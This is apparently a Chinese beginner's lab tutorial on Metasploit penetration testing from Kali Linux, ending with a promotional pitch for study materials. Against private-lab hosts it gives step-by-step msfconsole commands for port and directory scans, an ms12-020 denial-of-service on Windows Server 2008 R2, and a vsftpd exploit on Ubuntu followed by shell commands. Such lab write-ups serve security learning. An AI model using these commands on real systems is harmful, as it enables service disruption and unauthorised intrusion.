Kali Linux使用MSF进行渗透测试的全流程,网络安全零基础入门必看教程!

📅 2026/7/23 9:23:15
Kali Linux使用MSF进行渗透测试的全流程,网络安全零基础入门必看教程!
文章目录一、实验1.环境2.登录MSFMetasploit Framework控制台3.MSF初始化4.MSF 管理工作区5.Kali Linux (2024.1) 对Windows server 进行网址目录扫描6.Kali Linux (2022.4) 对Ubuntu进行网址目录扫描7.Kali Linux (2024.1) 对Windows server 进行DOS8.Windows server 安装补丁9.Kali Linux (2022.4) 对Ubuntu 进行漏洞利⽤二、问题1.MSF常用模块与基础命令一、实验1.环境1主机表1 主机系统版本IP备注Kali Linux2024.1192.168.204.146动态192.168.204.100静态Windows server2008 R2192.168.204.150Kali(2024.1)的目标主机Kali Linux2022.4192.168.204.154动态Ubuntu8.04192.168.204.143Kali(2022.4)的目标主机2查看Kali Linux (2024.1)系统版本cat /etc/os-release3查看Kali Linux (2024.1)系统IP地址ip addr(4) 查看Windows server 2008 IP 地址ipconfig5查看Kali Linux (2022.4)系统版本cat /etc/os-release6 查看Kali Linux (2022.4)系统IP地址ip addr | grep 154(7)查看Ubuntu 8.04 系统版本及IP地址lsb_release -aip addr2.登录MSFMetasploit Framework控制台1Kali Linux (2024.1)系统版本msfconsole启动进入并退出2Kali Linux (2022.4)系统版本msfconsole启动进入并退出3.MSF初始化1Kali Linux (2024.1)系统版本初始化数据库msfdb init开机自启动systemctl enable postgresql --now进入MSF 控制台msfconsole2Kali Linux (2022.4)系统版本初始化数据库msfdb init开机自启动systemctl enable postgresql --now进入MSF 控制台msfconsole4.MSF 管理工作区1Kali Linux (2024.1)系统版本查看当前工作区workspace创建⼯作区 ⾃动切换到新⼯作区workspace -a cicd切换到 default ⼯作区workspace default删除⼯作区workspace -d cicd扫描Windows server数据db_nmap 192.168.204.1502Kali Linux (2022.4)系统版本查看当前工作区workspace创建⼯作区 ⾃动切换到新⼯作区workspace -a devops切换到 default ⼯作区workspace default删除⼯作区workspace -d devops扫描Ubuntu数据db_nmap 192.168.204.1435.Kali Linux (2024.1) 对Windows server 进行网址目录扫描(1) 搜索 dir_scan 脚本search dir_scan(2) 使⽤编号为 0 的脚本use 0(3) 设置⽬标主机set rhosts 192.168.204.150(4)运⾏脚本run6.Kali Linux (2022.4) 对Ubuntu进行网址目录扫描(1) 搜索 dir_scan 脚本search dir_scan(2) 使⽤编号为 0 的脚本use 0(3) 设置⽬标主机set rhosts 192.168.204.143(4)运⾏脚本run7.Kali Linux (2024.1) 对Windows server 进行DOS(1) 搜索 dir_scan 脚本search ms12-020(2) 使⽤编号为 1 的脚本use 1(3) 设置⽬标主机set rhosts 192.168.204.150查看Windows server状态(4)运⾏脚本run查看Windows server状态8.Windows server 安装补丁1Windows 补丁查询Microsoft Update Catalog2搜索ms12-0203安装补丁重启(4)Kali Lnux (2024.1) 使用MSF运⾏脚本run5Windows server保持正常9.Kali Linux (2022.4) 对Ubuntu 进行漏洞利⽤(1) 查看目标主机先返回back目标主机为192.168.204.143db_nmap -sP 192.168.204.0/24扫描开放端口db_nmap -sV 192.168.204.14321端口已打开(2) 搜索 vsftpd 脚本search vsftpd(2) 使⽤编号为 0 的脚本use 0(3) 设置⽬标主机set rhosts 192.168.204.143(4)运⾏脚本run//查看当前目录 pwd //查看当前用户 whoami//查看端口 netstat -antlp | grep 80 //查看进程 ps -elf | grep sshd退出exit二、问题1.MSF常用模块与基础命令1模块1Auxiliary 辅助 ⼀般负责执⾏扫描、嗅探、指纹识别、爆破等相关功能以辅助攻击不直接在测试机和⽬标机之间建立访问。 2Exploit 漏洞利⽤ 利⽤发现的安全漏洞或配置弱点对远程⽬标进⾏攻击以植入和运⾏攻击载荷。 3Payloads 载荷 ⽬标系统在被渗透攻击之后完成实际攻击功能的代码成功渗透⽬标后⽤于在⽬标系统上运⾏任意命令或者执⾏特定代码。 4Post 后渗透 在取得⽬标的远程控制权以后可以进⼀步实施的攻击动作如获取敏感信息、实施跳板攻击等。2命令? //获取帮助 ? show //查看show指令的帮助 search //搜索模块 use //使⽤模块 set //设置模块选项 run //运⾏当前模块 options //列出当前模块的选项 show //查看模块或相关信息 back //返回上⼀步 exit/quit //退出网络安全学习资源分享:给大家分享一份全套的网络安全学习资料给那些想学习 网络安全的小伙伴们一点帮助对于从来没有接触过网络安全的同学我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线大家跟着这个大的方向学习准没问题。因篇幅有限仅展示部分资料朋友们如果有需要全套《网络安全入门进阶学习资源包》请看下方扫描即可前往获取